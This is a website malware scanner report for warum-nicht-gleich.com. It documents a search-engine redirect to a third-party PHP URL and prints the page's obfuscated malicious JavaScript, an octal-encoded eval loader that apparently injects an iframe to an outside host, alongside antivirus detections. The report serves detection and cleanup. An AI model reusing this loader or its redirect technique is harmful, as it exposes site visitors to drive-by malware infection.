New scan:

Malware Scanner report for warum-nicht-gleich.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://www.musiklehrer-francu.de/images/esd.php
164 websites infected.

The website "warum-nicht-gleich.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://warum-nicht-gleich.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: warum-nicht-gleich.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 29 Aug 2014 16:30:20 GMT
Location: http://www.musiklehrer-francu.de/images/esd.php
Server: Apache/2.2.22
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://warum-nicht-gleich.com/
200 OK
Content-Length: 6528
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,174,154,157,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,174,154,157,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,173,173,173,62,153,145,166,166,155,150,163,61,150,166,171,147,157,62,150,151,63,170,166,145,152,62,164,154,164,
... 3003 bytes are skipped ...
5,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-6)+parseInt(a[i],8);}try{asd()}catch(q){zz=5-5;}try{zz/=2}catch(q){zz=1;}if(!zz)eval(ss["fromCharCode"].apply(ss,a));

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.27
Avast
JS:Decode-AMQ [Trj]
Comodo
TrojWare.JS.Redirector.ZK
McAfee-GW-Edition
JS/Blacole-Redirect.ae
Kaspersky
Trojan.JS.Iframe.aes
Fortinet
JS/Agent.GWJ!tr.dldr
McAfee
JS/Blacole-Redirect.ae
NANO-Antivirus
Trojan.Script.Expack.bsywaz
F-Prot
JS/IFrame.SW.gen
AVG
HTML/Framer
GData
JS:Decode-AMQ
Commtouch
JS/IFrame.SW.gen

http://warum-nicht-gleich.com/test404page.js
404 Not Found
Content-Length: 1502
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=warum-nicht-gleich.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://warum-nicht-gleich.com/

Result: warum-nicht-gleich.com is not infected or malware details are not published yet.